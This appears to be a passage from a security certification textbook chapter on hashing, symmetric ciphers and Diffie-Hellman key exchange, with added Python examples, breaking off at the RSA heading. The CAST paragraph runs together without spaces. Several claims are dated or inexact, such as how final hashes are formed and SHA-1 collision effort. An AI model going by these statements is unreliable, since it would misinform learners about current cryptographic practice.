Hashing functions are very common and play an important role in the way information, such as passwords, is stored securely, and the way in which messages can be signed. By computing a digest of the message, less data needs to be signed by the more complex asymmetric encryption, and this still maintains assurances about message integrity. This is the primary purpose for which the protocols were designed, and their success will allow greater trust in electronic protocols and digital signatures.
SHA
Secure Hash Algorithm (SHA) refers to a set of hash algorithms designed and published by the National Institute of Standards and Technology (NIST) and the National Security Agency (NSA). These algorithms are included in the SHA standard Federal Information Processing Standards (FIPS) 180-2 and 180-3. The individual standards are named SHA-1, SHA-224, SHA-256, SHA-384, and SHA-512. The latter three variants are occasionally referred to collectively as SHA-2. The newest version is known as SHA-3, which is specified in FIPS 202.
SHA-1
SHA-1, developed in 1993, was designed as the algorithm to be used for secure hashing in the U.S. Digital Signature Standard (DSS). It is modeled on the MD4 algorithm and implements fixes in that algorithm discovered by the NSA. It creates message digests 160 bits long that can be used by the Digital Signature Algorithm (DSA), which can then compute the signature of the message. This is computationally simpler, as the message digest is typically much smaller than the actual message—smaller message, less work.
Tech Tip
Block Mode in Hashing
Most hash algorithms use block mode to process; that is, they process all input in set blocks of data such as 512-bit blocks. The final hash is typically generated by adding the output blocks together to form the final output string of 160 or 512 bits.
SHA-1 works, as do all hashing functions, by applying a compression function to the data input. It accepts an input of up to 2^64 bits and then compresses down to a hash of 160 bits. SHA-1 works in block mode, separating the data into words first, and then grouping the words into blocks. The words are 32-bit strings converted to hex; grouped together as 16 words, they make up a 512-bit block. If the data that is input to SHA-1 is not a multiple of 512, the message is padded with zeros and an integer describing the original length of the message. Once the message has been formatted for processing, the actual hash can be generated. The 512-bit blocks are taken in order until the entire message has been processed.
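The padding and block splitting described above, as an added Python example that is not part of the book. It follows the FIPS 180 layout for SHA-1/SHA-256 (512-bit blocks, 64-bit length field) and SHA-512 (1024-bit blocks, 128-bit length field); note that the standard appends a single 1 bit (the byte 0x80) before the zeros, a detail the text above leaves out.

```python
import struct


def md_pad(message, block_bytes=64, length_bytes=8):
    """Pad `message` for a block-mode hash: append 0x80, then zeros, then the
    original length in bits as a big-endian integer, so that the total is a
    whole number of blocks. Defaults are the SHA-1/SHA-256 sizes; use
    block_bytes=128, length_bytes=16 for SHA-384/SHA-512."""
    bit_length = len(message) * 8
    padded = message + b"\x80"
    zero_count = (block_bytes - length_bytes - len(padded) % block_bytes) % block_bytes
    padded += b"\x00" * zero_count
    padded += bit_length.to_bytes(length_bytes, "big")
    return padded


def split_blocks(padded, block_bytes=64):
    """Cut the padded message into the blocks the compression function
    consumes in order."""
    if len(padded) % block_bytes:
        raise ValueError("padded data is not a whole number of blocks")
    return [padded[i:i + block_bytes] for i in range(0, len(padded), block_bytes)]


def words32(block):
    """A 512-bit block as sixteen 32-bit big-endian words."""
    if len(block) != 64:
        raise ValueError("expected a 64-byte block")
    return list(struct.unpack(">16I", block))


def block_count(message, block_bytes=64, length_bytes=8):
    """How many blocks the compression function will run over for `message`."""
    return len(md_pad(message, block_bytes, length_bytes)) // block_bytes
```

A message of 55 bytes still fits in one 512-bit block with its padding and length field, while 56 bytes spills into a second block.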
Try to keep attacks on crypto-systems in perspective. While the theory of attacking hashing through collisions is solid, finding a collision still takes enormous amounts of effort. In the case of attacking SHA-1, the collision is able to be found faster than a pure brute-force method, but by most estimates will still take several years.
At one time, SHA-1 was one of the more secure hash functions, but it has been found to be vulnerable to a collision attack. This attack found a collision in 2^69 computations, less than the brute-force method of 2^80 computations. While this is not a tremendously practical attack, it does suggest a weakness. Thus, many security professionals are suggesting that implementations of SHA-1 be moved to one of the other SHA versions. These longer versions, SHA-256, SHA-384, and SHA-512, all have longer hash results, making them more difficult to attack successfully. The added security and resistance to attack in SHA-2 does require more processing power to compute the hash.
SHA-2
SHA-2 is a collective name for SHA-224, SHA-256, SHA-384, and SHA-512. SHA-256 is similar to SHA-1 in that it also accepts input of less than 2^64 bits and reduces that input to a hash. This algorithm reduces to 256 bits instead of SHA-1’s 160. Defined in FIPS 180-2 in 2002, SHA-256 is listed as an update to the original FIPS 180 that defined SHA. Similar to SHA-1, SHA-256 uses 32-bit words and 512-bit blocks. Padding is added until the entire message is a multiple of 512. SHA-256 uses sixty-four 32-bit words, eight working variables, and results in a hash value of eight 32-bit words, hence 256 bits. SHA-224 is a truncated version of the SHA-256 algorithm that results in a 224-bit hash value. There are no known collision attacks against SHA-256; however, an attack on reduced-round SHA-256 is possible. SHA-512 is also similar to SHA-1, but it handles larger sets of data. SHA-512 accepts up to 2^128 bits of input, which it pads until it has several blocks of data in 1024-bit blocks. SHA-512 also uses 64-bit words instead of SHA-1’s 32-bit words. It uses eight 64-bit words to produce the 512-bit hash value. SHA-384 is a truncated version of SHA-512 that uses six 64-bit words to produce a 384-bit hash.
While SHA-2 is not as common as SHA-1, more applications are starting to utilize it after SHA-1 was shown to be potentially vulnerable to a collision attack.
SHA-3
SHA-3 is the name for the SHA-2 replacement. In 2012, the Keccak hash function won the NIST competition and was chosen as the basis for the SHA-3 method. Because the algorithm is completely different from the previous SHA series, it has proved to be more resistant to attacks that are successful against them. As the SHA-3 series is relatively new, it has not been widely adopted in many cipher suites yet.
The SHA-2 and SHA-3 series are currently approved for use. SHA-1 has been deprecated and its use discontinued in many strong cipher suites.
RIPEMD
RACE Integrity Primitives Evaluation Message Digest (RIPEMD) is a hashing function developed by the RACE Integrity Primitives Evaluation (RIPE) consortium. It originally provided a 128-bit hash and was later shown to have problems with collisions. RIPEMD was strengthened to a 160-bit hash known as RIPEMD-160 by Hans Dobbertin, Antoon Bosselaers, and Bart Preneel. There are also 256- and 320-bit versions of the algorithm known as RIPEMD-256 and RIPEMD-320.
RIPEMD-160
RIPEMD-160 is an algorithm based on MD4, but it uses two parallel channels with five rounds. The output consists of five 32-bit words to make a 160-bit hash. There are also larger output extensions of the RIPEMD-160 algorithm. These extensions, RIPEMD-256 and RIPEMD-320, offer outputs of 256 bits and 320 bits, respectively. While these offer larger output sizes, this does not make the hash function inherently stronger.
Message Digest
Message Digest (MD) is the generic version of one of several algorithms that are designed to create a message digest or hash from data input into the algorithm. MD algorithms work in the same manner as SHA in that they use a secure method to compress the file and generate a computed output of a specified number of bits. The MD algorithms were all developed by Ronald L. Rivest of MIT.
MD2
MD2 was developed in 1989 and is in some ways an early version of the later MD5 algorithm. It takes a data input of any length and produces a hash output of 128 bits. It is different from MD4 and MD5 in that MD2 is optimized for 8-bit machines, whereas the other two are optimized for 32-bit machines. After the function has been run for every 16 bytes of the message, the output result is a 128-bit digest. The only known attack that is successful against MD2 requires that the checksum not be appended to the message before the hash function is run. Without a checksum, the algorithm can be vulnerable to a collision attack. Some collision attacks are based upon the algorithm’s initialization vector (IV).
MD4
MD4 was developed in 1990 and is optimized for 32-bit computers. It is a fast algorithm, but it is subject to more attacks than more secure algorithms such as MD5. An extended version of MD4 computes the message in parallel and produces two 128-bit outputs—effectively a 256-bit hash. Even though a longer hash is produced, security has not been improved because of basic flaws in the algorithm. A cryptographer, Hans Dobbertin, has shown how collisions in MD4 can be found in under a minute using just a PC. This vulnerability to collisions applies to 128-bit MD4 as well as 256-bit MD4. Because of weaknesses, people have moved away from MD4 to more robust hash functions.
MD5
MD5 was developed in 1991 and is structured after MD4 but with additional security to overcome the problems in MD4. Therefore, it is very similar to the MD4 algorithm, only slightly slower and more secure. MD5 creates a 128-bit hash of a message of any length.
Recently, successful attacks on the algorithm have occurred. Cryptanalysis has displayed weaknesses in the compression function. However, this weakness does not lend itself to an attack on MD5 itself. Czech cryptographer Vlastimil Klíma published work showing that MD5 collisions can be computed in about eight hours on a standard home PC. In November 2007, researchers published results showing the ability to have two entirely different Win32 executables with different functionality but the same MD5 hash. This discovery has obvious implications for the development of malware. The combination of these problems with MD5 has pushed people to adopt a strong SHA version for security reasons.
Tech Tip
Rainbow Tables
Rainbow tables are precomputed hash tables that enable looking up small text entries via their hash values. This makes hashed passwords “reversible” by looking up the hash in a precomputed hash table. This works for small passwords (less than 10 characters) and is very fast. Salting passwords is one of the defenses against these tables.
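Why a precomputed table works against unsalted hashes and how a per-user salt plus a work factor (here PBKDF2-HMAC-SHA256) defeats it, as an added Python example that is not part of the book. The three candidate passwords are constructed sample values; the iteration count is an assumed setting.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # work factor: every guess, precomputed or not, costs this much


def unsalted_hash(password):
    """Plain SHA-256 of the password: the same password gives the same digest
    for every user and every system, which is what a precomputed table exploits."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(candidate_passwords):
    """A digest -> password table computed once. Because unsalted hashing is
    deterministic, one such table can be checked against any stored digest."""
    return {unsalted_hash(p): p for p in candidate_passwords}


def lookup(table, digest):
    """Reverse an unsalted digest by table lookup; None if it is not in the table."""
    return table.get(digest)


def salted_hash(password, salt=None, iterations=ITERATIONS):
    """PBKDF2-HMAC-SHA256 with a random 16-byte per-user salt. Returns (salt,
    key); both are stored, the salt in the clear. Different users with the
    same password get different keys, so a shared table no longer applies."""
    if salt is None:
        salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, key


def verify_salted(password, salt, stored_key, iterations=ITERATIONS):
    """Recompute with the stored salt and compare in constant time."""
    _, key = salted_hash(password, salt, iterations)
    return hmac.compare_digest(key, stored_key)
```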
Hashing Summary
Hashing functions are very common, and they play an important role in the way information, such as passwords, is stored securely and the way in which messages can be signed. By computing a digest of the message, less data needs to be signed by the more complex asymmetric encryption, and this still maintains assurances about message integrity. This is the primary purpose for which the protocols were designed, and their success will allow greater trust in electronic protocols and digital signatures. The following illustration shows an MD5 hash calculation in Linux.
Symmetric Encryption
Symmetric encryption is the older and simpler method of encrypting information. The basis of symmetric encryption is that both the sender and the receiver of the message have previously obtained the same key. This is, in fact, the basis for even the oldest ciphers—the Spartans needed the exact same size cylinder, making the cylinder the “key” to the message, and in shift ciphers both parties need to know the direction and amount of shift being performed. All symmetric algorithms are based upon this shared secret principle, including the unbreakable one-time pad method.
Figure 5.6 is a simple diagram showing the process that a symmetric algorithm goes through to provide encryption from plaintext to ciphertext. This ciphertext message is, presumably, transmitted to the message recipient, who goes through the process to decrypt the message using the same key that was used to encrypt the message. Figure 5.6 shows the keys to the algorithm, which are the same value in the case of symmetric encryption.
• Figure 5.6 Layout of a symmetric algorithm
Unlike with hash functions, a cryptographic key is involved in symmetric encryption, so there must be a mechanism for key management (discussed earlier in the chapter). Managing the cryptographic keys is critically important in symmetric algorithms because the key unlocks the data that is being protected. However, the key also needs to be known by, or transmitted to in a confidential way, the party with which you wish to communicate. A key must be managed at all stages, which requires securing it on the local computer, securing it on the remote one, protecting it from data corruption, protecting it from loss, and, probably the most important step, protecting it while it is transmitted between the two parties. Later in the chapter we will look at public key cryptography, which greatly eases the key management issue, but for symmetric algorithms the most important lesson is to store and send the key only by known secure means.
Some of the more popular symmetric encryption algorithms in use today are DES, 3DES, AES, and IDEA.
DES
DES, the Data Encryption Standard, was developed in response to the National Bureau of Standards (NBS), now known as the National Institute of Standards and Technology (NIST), issuing a request for proposals for a standard cryptographic algorithm in 1973. NBS received a promising response in an algorithm called Lucifer, originally developed by IBM. The NBS and the NSA worked together to analyze the algorithm’s security, and eventually DES was adopted as a federal standard in 1976.
DES is what is known as a block cipher; it segments the input data into blocks of a specified size, typically padding the last block to make it a multiple of the block size required. This is in contrast to a stream cipher, which encrypts the data bit by bit. In the case of DES, the block size is 64 bits, which means DES takes a 64-bit input and outputs 64 bits of ciphertext. This process is repeated for all 64-bit blocks in the message. DES uses a key length of 56 bits, and all security rests within the key. The same algorithm and key are used for both encryption and decryption.
At the most basic level, DES performs a substitution and then a permutation (a form of transposition) on the input, based upon the key. This action is called a round, and DES performs this 16 times on every 64-bit block. The algorithm goes step by step, producing 64-bit blocks of ciphertext for each plaintext block. This is carried on until the entire message has been encrypted with DES. As mentioned, the same algorithm and key are used to decrypt and encrypt with DES. The only difference is that the sequence of key permutations is used in reverse order.
Over the years that DES has been a cryptographic standard, a lot of cryptanalysis has occurred, and while the algorithm has held up very well, some problems have been encountered. Weak keys are keys that are less secure than the majority of keys allowed in the keyspace of the algorithm. In the case of DES, because of the way the initial key is modified to get the subkey, certain keys are weak keys. The weak keys equate in binary to having all 1’s or all 0’s, like those shown in Figure 5.7, or to having half the key all 1’s and the other half all 0’s.
• Figure 5.7 Weak DES keys
Semiweak keys, with which two keys will encrypt plaintext to identical ciphertext, also exist, meaning that either key will decrypt the ciphertext. The total number of possibly weak keys is 64, which is very small relative to the 2^56 possible keys in DES.
With 16 rounds and not using a weak key, DES is reasonably secure and, amazingly, has been for more than two decades. In 1999, a distributed effort consisting of a supercomputer and 100,000 PCs over the Internet was made to break a 56-bit DES key. By attempting more than 240 billion keys per second, the effort was able to retrieve the key in less than a day. This demonstrates an incredible resistance to cracking for a 20-year-old algorithm, but it also demonstrates that more stringent algorithms are needed to protect data today.
3DES
Triple DES (3DES) is a variant of DES. Depending on the specific variant, it uses either two or three keys instead of the single key that DES uses. It also spins through the DES algorithm three times via what’s called multiple encryption.
Multiple encryption can be performed in several different ways. The simplest method of multiple encryption is just to stack algorithms on top of each other—taking plaintext, encrypting it with DES, then encrypting the first ciphertext with a different key, and then encrypting the second ciphertext with a third key. In reality, this technique is less effective than the technique that 3DES uses. One of the modes of 3DES (EDE mode) is to encrypt with one key, then decrypt with a second, and then encrypt with a third, as shown in Figure 5.8.
• Figure 5.8 Diagram of 3DES
This greatly increases the number of attempts needed to retrieve the key and is a significant enhancement of security. The additional security comes at a price, however. It can take up to three times longer to compute 3DES than to compute DES. However, the advances in memory and processing power in today’s electronics should make this problem irrelevant in all devices except for very small low-power handhelds.
The only weaknesses of 3DES are those that already exist in DES. However, due to the use of different keys in the same algorithm, effecting a longer key length by adding the first keyspace to the second keyspace, and the greater resistance to brute-forcing, 3DES has less actual weakness. While 3DES continues to be popular and is still widely supported, AES has taken over as the symmetric encryption standard.
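The round structure described in the DES section (substitute, permute, repeat 16 times, decrypt by running the subkeys in reverse) and the EDE construction of Figure 5.8, as one added Python example that is not part of the book. This is a toy 64-bit Feistel cipher, not DES: the round function and the subkey schedule are assumed keyed-hash stand-ins for DES's S-boxes and permutations, but the Feistel wiring and the EDE wrapper are the real ones.

```python
from hashlib import sha256

ROUNDS = 16
HALF = 4  # bytes; two halves make a 64-bit block, as in DES


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(right, subkey):
    """Toy round function (assumption: a keyed hash stands in for DES's
    expansion, S-box substitution and P-box permutation)."""
    return sha256(subkey + right).digest()[:HALF]


def subkeys(key, rounds=ROUNDS):
    """One subkey per round (assumption: derived by hashing; DES derives its
    16 subkeys by shifting and permuting the 56-bit key)."""
    return [sha256(key + bytes([i])).digest()[:8] for i in range(rounds)]


def feistel(block, round_keys):
    """Feistel rounds: L' = R, R' = L XOR f(R, k_i), with the final swap.
    The same code decrypts when the round keys are supplied in reverse order,
    which is exactly the DES property described in the text."""
    if len(block) != 2 * HALF:
        raise ValueError("block must be 64 bits")
    left, right = block[:HALF], block[HALF:]
    for k in round_keys:
        left, right = right, _xor(left, _f(right, k))
    return right + left


def encrypt_block(block, key):
    return feistel(block, subkeys(key))


def decrypt_block(block, key):
    return feistel(block, subkeys(key)[::-1])


def ede_encrypt(block, k1, k2, k3):
    """EDE mode (Figure 5.8): encrypt with k1, decrypt with k2, encrypt with k3."""
    return encrypt_block(decrypt_block(encrypt_block(block, k1), k2), k3)


def ede_decrypt(block, k1, k2, k3):
    """Undo EDE by running the three stages backwards: D(k3), E(k2), D(k1)."""
    return decrypt_block(encrypt_block(decrypt_block(block, k3), k2), k1)
```

With all three keys equal, the middle decryption cancels the first encryption and EDE reduces to a single encryption; that is what let EDE hardware interoperate with single-key installations.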
AES
The current gold standard for symmetric encryption is the AES algorithm. Developed in response to a worldwide call in the late 1990s for a new symmetric cipher, a group of Dutch researchers submitted a method called Rijndael (pronounced “rain doll”). In the fall of 2000, NIST picked Rijndael to be the new AES. It was chosen for its overall security as well as its good performance on limited-capacity devices. Rijndael’s design was influenced by Square, also written by Joan Daemen and Vincent Rijmen. Like Square, Rijndael is a block cipher that separates data input into 128-bit blocks. Rijndael can also be configured to use blocks of 192 or 256 bits, but AES has standardized on 128-bit blocks. AES can have key sizes of 128, 192, and 256 bits, with the size of the key affecting the number of rounds used in the algorithm. Longer key versions are known as AES-192 and AES-256, respectively.
Tech Tip
AES in Depth
For a more in-depth description of AES, see the NIST document http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf.
The Rijndael/AES algorithm is well thought out and has a suitable key length to provide security for many years to come. While no efficient attacks currently exist against AES, more time and analysis will tell if this standard can last as long as DES has.
CASTCASTisanencryptionalgorithmthatissimilartoDESinitsstructure.ItwasdesignedbyCarlisleAdamsandStaffordTavares.CASTusesa64-bitblocksizefor64-and128-bitkeyversions,anda128-bitblocksizeforthe256-bitkeyversion.LikeDES,itdividestheplaintextblockintoalefthalfandarighthalf.TherighthalfisthenputthroughfunctionfandthenisXORedwiththelefthalf.Thisvaluebecomesthenewrighthalf,andtheoriginalrighthalfbecomesthenewlefthalf.Thisisrepeatedforeightroundsfora64-bitkey,andtheleftandrightoutputisconcatenatedtoformtheciphertextblock.ThealgorithminCAST-256formwassubmittedfortheAESstandardbutwasnotchosen.CASThasundergonethoroughanalysis,withonlyminorweaknessesdiscoveredthataredependentonlownumbersofrounds.Currently,nobetterwayisknowntobreakhigh-roundCASTthanbybrute-forcingthekey,meaningthatwithsufficientkeylength,CASTshouldbeplacedwithothertrustedalgorithms.
RC
RC is a general term for several ciphers all designed by Ron Rivest; RC officially stands for Rivest Cipher. RC1, RC2, RC3, RC4, RC5, and RC6 are all ciphers in the series. RC1 and RC3 never made it to release, but RC2, RC4, RC5, and RC6 are all working algorithms.
RC2
RC2 was designed as a DES replacement, and it is a variable-key-size block-mode cipher. The key size can be from 8 bits to 1024 bits, with the block size being fixed at 64 bits. RC2 breaks up the input blocks into four 16-bit words and then puts them through 18 rounds of either mix or mash operations, outputting 64 bits of ciphertext for 64 bits of plaintext. According to RSA, RC2 is up to three times faster than DES. RSA maintained RC2 as a trade secret for a long time, with the source code eventually being illegally posted on the Internet. The ability of RC2 to accept different key lengths is one of the larger vulnerabilities in the algorithm: any key length below 64 bits can be easily retrieved by modern computational power. Additionally, there is a related-key attack that needs 2^34 chosen plaintexts to work. Considering these weaknesses, RC2 is not recommended as a strong cipher.
RC5
RC5 is a block cipher, published in 1994. It has multiple variable elements: the number of rounds, the key size, and the block size. If configured to run enough rounds, RC5 seems to provide adequate security against current brute-forcing technology. Rivest recommends using at least 12 rounds. With 12 rounds in the algorithm, linear cryptanalysis proves less effective than brute force against RC5, and differential analysis fails for 15 or more rounds. A newer algorithm is RC6.
RC6
RC6 is based on the design of RC5. It uses a 128-bit block size, separated into four words of 32 bits each. It uses a round count of 20 to provide security, and it has three possible key sizes: 128, 192, and 256 bits. RC6 is a modern algorithm that runs well on 32-bit computers. With a sufficient number of rounds, the algorithm makes both linear and differential cryptanalysis infeasible. The available key lengths make brute-force attacks extremely time-consuming. RC6 should provide adequate security for some time to come.
RC4
RC4 was created before RC5 and RC6, but it differs in operation. RC4 is a stream cipher, whereas all the symmetric ciphers we have looked at so far have been block ciphers. A stream cipher works by enciphering the plaintext in a stream, usually bit by bit or byte by byte. This makes stream ciphers faster than block-mode ciphers. Stream ciphers accomplish this by performing a bitwise XOR of the plaintext stream with a generated keystream. RC4 operates in this manner. It was developed in 1987 and remained a trade secret of RSA until it was posted to the Internet in 1994. RC4 can use a key length of 8 to 2048 bits, though the most common versions use 128-bit keys or, if subject to the old export restrictions, 40-bit keys. The key is used to initialize a 256-byte state table. This table is used to generate the pseudo-random stream that is XORed with the plaintext to generate the ciphertext. Conversely, the same stream is XORed with the ciphertext to recover the plaintext. The algorithm is fast, sometimes ten times faster than DES. The most vulnerable point of the encryption is the possibility of weak keys: one key in 256 generates keystream bytes closely correlated with the key bytes. Proper implementations of RC4 need to include weak key detection. As with any stream cipher, a key (and therefore a keystream) must never be reused for two messages, because XORing the two ciphertexts together cancels the keystream and leaves the XOR of the two plaintexts.
RC4 was for many years the most widely used stream cipher, appearing in popular protocols such as Transport Layer Security (TLS) and in WEP and WPA (TKIP). Biases in its keystream have since been turned into practical attacks: WEP is thoroughly broken, RFC 7465 (2015) prohibits RC4 cipher suites in TLS, and WPA2 uses AES (CCMP) in place of RC4. RC4 should be treated as a legacy cipher and not chosen for new designs.
Blowfish
Blowfish was designed in 1994 by Bruce Schneier. It is a block-mode cipher using 64-bit blocks and a variable key length from 32 to 448 bits. It was designed to run quickly on 32-bit microprocessors and is optimized for situations with few key changes. Encryption is done by separating the 64-bit input block into two 32-bit words, and then a function is executed every round. Blowfish has 16 rounds; once the rounds are completed, the two words are then recombined to form the 64-bit output ciphertext. The only successful cryptanalysis to date against Blowfish has been against variants that used a reduced number of rounds. There does not seem to be a weakness in the full 16-round version.
Twofish
Twofish was developed by Bruce Schneier, David Wagner, Chris Hall, Niels Ferguson, John Kelsey, and Doug Whiting. Twofish was one of the five finalists for the AES competition. Like other AES entrants, it is a block cipher, utilizing 128-bit blocks with a variable-length key of up to 256 bits. It uses 16 rounds and splits the key material into two sets, one to perform the actual encryption and the other to load into the algorithm's S-boxes. This algorithm is available for public use and has withstood public analysis.
Tech Tip
S-Boxes
S-boxes, or substitution boxes, are a method used to provide confusion, a separation of the relationship between the key bits and the ciphertext bits. Used in most symmetric schemes, they perform a form of substitution and can provide significant strengthening of an algorithm against certain forms of attack. They can be in the form of lookup tables, either static, as in DES, or dynamic (based on the key), as in Twofish.
IDEA
IDEA (International Data Encryption Algorithm) started out as PES, the Proposed Encryption Standard, in 1990; it was modified to improve its resistance to differential cryptanalysis, and its name was changed to IDEA in 1992. It is a block-mode cipher using a 64-bit block size and a 128-bit key. The input plaintext is split into four 16-bit segments, A, B, C, and D. The process uses eight rounds, with a final four-step process. The output of the last four steps is then concatenated to form the ciphertext. All current cryptanalysis on full, eight-round IDEA shows that the most efficient attack would be to brute-force the key. The 128-bit key would prevent this attack being accomplished, given current computer technology. The only known issue is that IDEA is susceptible to weak keys, such as a key made of all 0s. This weak key condition is easy to check for, and the weakness is simple to mitigate.
Block vs. Stream
When encryption operations are performed on data, there are two primary modes of operation, block and stream. Block operations are performed on blocks of data, enabling both transposition and substitution operations. This is possible when large pieces of data are present for the operations. Stream data has become more common with audio and video across the Web. The primary characteristic of stream data is that it is not available in large chunks, but either bit by bit or byte by byte, pieces too small for block operations. Stream ciphers operate using substitution only (an XOR with the keystream), so their security rests entirely on the keystream being unpredictable and never reused; this makes them less forgiving of implementation mistakes than block ciphers. Table 5.1 compares and contrasts block and stream ciphers.
Table 5.1 Comparison of Block and Stream Ciphers
Symmetric Encryption Summary
Symmetric algorithms are important because they are comparatively fast and have few computational requirements. Their main weakness is that two geographically distant parties both need to have a key that matches the other key exactly (see Figure 5.9).
• Figure 5.9 Symmetric keys must match exactly to encrypt and decrypt the message.
Asymmetric Encryption
Asymmetric encryption is more commonly known as public key cryptography. Asymmetric encryption is in many ways completely different from symmetric encryption. While both are used to keep data from being seen by unauthorized users, asymmetric cryptography uses two keys instead of one. It was introduced by Whitfield Diffie and Martin Hellman in 1976. The system uses a pair of keys: a private key that is kept secret and a public key that can be sent to anyone. The system's security relies upon resistance to deducing one key, given the other, and thus retrieving the plaintext from the ciphertext. Asymmetric encryption creates the possibility of digital signatures and also addresses the main weakness of symmetric cryptography. The ability to send messages securely without senders and receivers having had prior contact has become one of the basic concerns with secure communication. Digital signatures will enable faster and more efficient exchange of all kinds of documents, including legal documents. With strong algorithms and good key lengths, security can be assured.
Asymmetric encryption involves two separate but mathematically related keys. The keys are used in an opposing fashion. One key undoes the actions of the other and vice versa. So, as shown in Figure 5.10, if you encrypt a message with one key, the other key is used to decrypt the message. In the top example, Alice wishes to send a private message to Bob, so she uses Bob's public key to encrypt the message. Then, since only Bob's private key can decrypt the message, only Bob can read it. In the lower example, Bob wishes to send a message with proof that it is from him. By encrypting it with his private key, anyone who decrypts it with his public key knows the message came from Bob; this is the principle behind digital signatures.
• Figure 5.10 Using an asymmetric algorithm
Public key cryptography always involves two keys, a public key and a private key, which together are known as a key pair. The public key is made widely available to anyone who may need it, while the private key is closely safeguarded and shared with no one.
Asymmetric keys are distributed using certificates. A digital certificate contains information about the association of the public key to an entity, and additional information that can be used to verify the current validity of the certificate and the key. When keys are exchanged between machines, such as during an SSL/TLS handshake, the exchange is done by passing certificates.
Asymmetric methods are significantly slower than symmetric methods and thus are typically not suitable for bulk encryption.
Public key systems typically work by using hard math problems. One of the more common methods relies on the difficulty of factoring large numbers. These functions are often called trapdoor functions, as they are difficult to process without the key but easy to process when you have the key, the trapdoor through the function. For example, given a prime number, say 293, and another prime, such as 307, it is an easy function to multiply them together to get 89,951. Given 89,951, it is not simple to find the factors 293 and 307 unless you know one of them already. Computers can easily multiply very large primes with hundreds or thousands of digits but cannot easily factor the product. The strength of these functions is very important: because an attacker is likely to have access to the public key, he can run tests of known plaintext and produce ciphertext. This allows instant checking of guesses that are made about the keys of the algorithm. Public key systems, because of their design, also form the basis for digital signatures, a cryptographic method for securely identifying people. RSA, Diffie-Hellman, elliptic curve cryptography (ECC), and ElGamal are all popular asymmetric protocols. We will look at all of them and their suitability for different functions.
Cross Check
Digital Certificates
In Chapter 6 you will learn more about digital certificates and how encryption is important to a public key infrastructure. Why is an asymmetric algorithm so important to digital signatures?
Diffie-Hellman
Diffie-Hellman (DH) was created in 1976 by Whitfield Diffie and Martin Hellman. This protocol is one of the most common key exchange protocols in use today. It plays a role in the electronic key exchange method of the Secure Sockets Layer (SSL) protocol. It is also used by the Transport Layer Security (TLS), Secure Shell (SSH), and IP Security (IPsec) protocols. Diffie-Hellman is important because it enables the sharing of a secret key between two people who have not contacted each other before. The protocol, like RSA, uses large prime numbers to work. Two users agree on two numbers, P and G, with P being a sufficiently large prime number and G being the generator. Each user picks a secret number, a and b respectively. Then both users compute their public number:
User 1: X = G^a mod P, with X being the public number
User 2: Y = G^b mod P, with Y being the public number
The users then exchange public numbers. User 1 now knows P, G, a, X, and Y; user 2 knows P, G, b, X, and Y.
User 1 computes Ka = Y^a mod P
User 2 computes Kb = X^b mod P
Since Y^a = (G^b)^a = G^(ab) = (G^a)^b = X^b (mod P), Ka = Kb = K, and both users now know the new shared secret K. An eavesdropper who sees only P, G, X, and Y must solve the discrete logarithm problem to recover a or b. This is the basic algorithm, and although methods have been created to strengthen it, Diffie-Hellman is still in wide use. It remains very effective because of the nature of what it is protecting: a temporary, automatically generated secret key that is good only for a single communication session. Note that basic Diffie-Hellman authenticates nobody: unless X and Y are tied to their senders by some other means (for example, a signature over the exchange, backed by a certificate), an active attacker can run a separate exchange with each side and relay between them. Variations of Diffie-Hellman include Ephemeral Diffie-Hellman (EDH, also written DHE), Elliptic Curve Diffie-Hellman (ECDH), and Elliptic Curve Diffie-Hellman Ephemeral (ECDHE). These are discussed in detail later in the chapter.
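The exchange described above, carried out in Python with the text's names (P, G, a, b, X, Y, Ka, Kb) and the small textbook values P = 23, G = 5, as an added example; this is not code from the original text. Two things are the example's own additions rather than part of the protocol as written above: the range check on the peer's public value (rejecting 0, 1, and P-1, which would force K into a tiny attacker-chosen set) and the assumed derivation of a fixed-size session key by hashing K with SHA-256. Real deployments use 2048-bit or larger groups, not P = 23.

```python
"""Diffie-Hellman with the text's notation, plus an ephemeral variant, as an added example."""
import hashlib
import secrets


def dh_public(P: int, G: int, secret: int) -> int:
    """Public number G^secret mod P (the text's X for user 1, Y for user 2)."""
    return pow(G, secret, P)


def dh_shared(P: int, peer_public: int, secret: int) -> int:
    """Shared secret peer_public^secret mod P (the text's Ka = Y^a, Kb = X^b)."""
    if not 1 < peer_public < P - 1:
        # Example's own check: 0, 1 and P-1 collapse K into {0, 1, P-1}.
        raise ValueError("peer public value out of range")
    return pow(peer_public, secret, P)


def session_key(K: int, info: bytes = b"dh-session") -> bytes:
    """Assumed KDF for the example: SHA-256 over K || info gives a 32-byte symmetric key."""
    k_bytes = K.to_bytes((K.bit_length() + 7) // 8 or 1, "big")
    return hashlib.sha256(k_bytes + info).digest()


def exchange(P: int, G: int, a: int, b: int) -> dict:
    """Run the whole exchange with fixed secrets a and b; returns every value the text names."""
    X = dh_public(P, G, a)      # user 1 sends X
    Y = dh_public(P, G, b)      # user 2 sends Y
    Ka = dh_shared(P, Y, a)     # user 1 computes Y^a mod P
    Kb = dh_shared(P, X, b)     # user 2 computes X^b mod P
    return {"X": X, "Y": Y, "Ka": Ka, "Kb": Kb}


def ephemeral_exchange(P: int, G: int) -> dict:
    """Ephemeral DH: fresh random secrets for every session (the EDH/DHE idea)."""
    while True:
        a = secrets.randbelow(P - 2) + 1    # secret in [1, P-2]
        b = secrets.randbelow(P - 2) + 1
        try:
            return exchange(P, G, a, b)
        except ValueError:
            continue  # a degenerate public value; negligible for real group sizes


if __name__ == "__main__":
    # Textbook values: P = 23, G = 5, a = 6, b = 15 give X = 8, Y = 19, K = 2.
    result = exchange(23, 5, 6, 15)
    print(result, session_key(result["Ka"]).hex())
    print(ephemeral_exchange(23, 5))
```

Each call to ephemeral_exchange produces a different K, which is what gives DHE its forward secrecy: compromising one session's secrets tells an attacker nothing about the others.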
Diffie-Hellman is the gold standard for key exchange, and for the CompTIA Security+ exam, you should understand the subtle differences between the different forms: DH, EDH, ECDH, and ECDHE.
RSA
